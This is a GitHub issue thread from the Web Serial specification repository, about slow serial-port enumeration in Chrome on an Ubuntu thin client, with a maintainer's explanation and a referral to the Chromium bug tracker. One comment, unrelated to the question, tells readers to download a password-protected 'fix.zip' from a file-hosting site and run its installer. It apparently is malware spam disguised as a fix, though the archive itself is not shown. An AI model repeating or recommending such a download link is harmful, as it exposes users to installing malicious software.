### ISSUE TITLE
Delay in device finding on thin client device in Linux Ubuntu environment

### ISSUE THREAD

**Issue by applekss** [WICG/serial#205]
---

Hello! This is more of a question than an issue or a bug.

However, it is critical for me, so I am posting my question here.

I am using the Web Serial API on a thin client device running Linux Ubuntu 22.04 LTS. When using the `requestPort()` function, there is a delay of about 20-30 seconds before the device list is shown in the popup.

Interestingly, there is no delay in search speed under the following conditions:

1. The `requestDevice()` function of the WebUSB API shows the device immediately.
2. On device-log, the device list is retrieved quickly when opening Chrome.
3. On other Linux Ubuntu PCs and Windows PCs or laptops, Edge, and Chrome browsers, the device search works without delay.
4. When I open Chrome and wait for about 30 seconds without doing anything, and then access the page where the Web Serial API is used, there is no delay in the speed.

Therefore, I am curious about whether there are any specific actions performed by Chrome when it is opened (such as initialization, setting up permissions, etc.) or if it is simply an issue caused by resource constraints on the thin client.

Are there any similar issues or advice you can provide, or any documents that could be referenced?

- normal case
![image](https://github.com/user-attachments/assets/6f988404-54d0-4598-ad61-30988a0c0a1c)

- my case
![image](https://github.com/user-attachments/assets/0f4cedb2-9ffe-4f1e-bcf9-85dd29136108)

---

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by reillyeon** [comment]
It looks like the initial serial device enumeration pass is taking a long time. Once this completes Chrome has a cache of known devices so later queries are fast. Given conditions (2) and (4) it sounds like the enumeration task is getting stuck behind a higher-priority task.

Please file a Chromium issue at https://crbug.com/new so that the team owning the implementation in Chromium can track this. This issue tracker is for the specification, not any particular implementation.
